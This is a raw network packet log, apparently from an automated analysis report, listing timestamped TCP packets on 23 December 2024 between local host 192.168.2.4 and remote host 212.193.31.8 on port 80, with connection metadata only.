                                                                      Dec 23, 2024 06:38:40.093125105 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093137980 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093403101 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093430042 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093442917 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093455076 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093525887 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093539000 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093553066 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093565941 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093580008 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093591928 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093604088 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093616962 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093643904 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093656063 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093667984 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093681097 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093705893 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093722105 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093740940 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093755007 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093767881 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.415358067 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.535375118 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.535706043 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.535706043 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.535809994 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.535830975 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.535847902 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.535866976 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.535897017 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.535917044 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.535936117 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.535952091 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.535969973 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536040068 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536041021 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536041021 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536078930 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536078930 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536098003 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536124945 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536145926 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536170959 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536192894 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536212921 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536233902 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536253929 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536277056 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536295891 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536317110 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536350965 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536370039 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536400080 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536400080 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536426067 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536447048 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536494970 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536494970 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536528111 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536546946 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536565065 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536581039 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536602974 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536623955 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536640882 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536672115 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536700010 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536717892 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536741018 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536760092 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536783934 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536802053 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536818981 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536849022 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536866903 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536886930 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536920071 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536920071 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536942005 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536966085 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536993980 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537009954 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537033081 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537059069 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537086010 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537103891 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537121058 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537147999 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537170887 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537189960 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537213087 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537230968 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537245989 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537264109 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537290096 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537306070 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537331104 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537353992 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537369967 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537394047 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537415981 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537436962 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537458897 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537480116 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537503958 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537524939 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537574053 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537574053 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537606001 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537623882 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537642956 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537664890 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537687063 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537728071 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537728071 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537770033 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537770033 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537797928 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537826061 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537842035 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537864923 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537902117 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537933111 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537934065 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537954092 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.537976980 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538003922 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538022041 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538044930 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538063049 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538084984 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538104057 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538127899 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538153887 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538172007 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538194895 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538220882 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538239956 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538255930 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538276911 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538297892 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538319111 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538347006 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538366079 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538398981 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538398981 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538422108 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538444042 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538470030 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538487911 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538508892 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538532019 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538554907 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538570881 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538588047 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538609982 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538630009 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538650036 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538674116 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538701057 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538718939 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538733959 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538764000 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538779974 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538800001 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538827896 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538844109 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538863897 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538889885 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538906097 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538927078 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538954973 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538973093 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.538989067 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539014101 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539041042 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539060116 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539081097 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539099932 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539124012 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539148092 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539167881 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539186954 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539206982 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539233923 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539249897 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539268017 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539294004 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539309978 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539330006 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539364100 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539397955 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539397955 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539419889 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539443016 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539469004 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539484978 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539505005 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539529085 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539551973 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539578915 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539597034 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539628983 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539628983 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539650917 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539680004 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539705992 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539725065 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539741993 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539762974 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539783955 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539804935 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539824963 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539845943 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539869070 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539889097 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539907932 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539931059 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539958954 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539977074 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.539994001 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540018082 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540038109 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540059090 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540081978 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540107965 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540127039 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540148973 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540167093 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540189981 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540208101 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540242910 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540242910 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540261984 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540298939 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540329933 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540329933 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540350914 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540374994 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540400982 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540419102 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540441036 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540460110 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540477991 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540510893 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540510893 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540533066 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540558100 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540584087 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540601969 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540626049 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540652990 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540671110 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540693998 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540712118 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540730953 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540764093 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540764093 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540786028 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540803909 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540827036 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540858984 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540879011 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540896893 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540920019 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540941000 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540957928 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540981054 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.540997028 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541019917 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541039944 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541069031 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541086912 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541120052 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541120052 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541146994 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541167021 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541194916 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541224003 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541241884 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541270971 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541270971 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541292906 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541316032 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541333914 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541361094 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541378975 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541398048 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541425943 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541440964 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541469097 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541496038 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541513920 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541537046 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541555882 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541570902 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541591883 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541618109 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541634083 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541652918 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541678905 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541697025 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541718960 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541737080 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541757107 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541778088 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541806936 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541834116 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541852951 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541874886 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541893959 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541908979 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541935921 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541954994 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541970968 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.541999102 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542022943 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542041063 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542062044 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542078018 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542100906 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542155981 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542155981 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542155981 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542191029 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542208910 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542227030 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542243004 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542263031 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542282104 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542303085 CET4974180192.168.2.4212.193.31.8
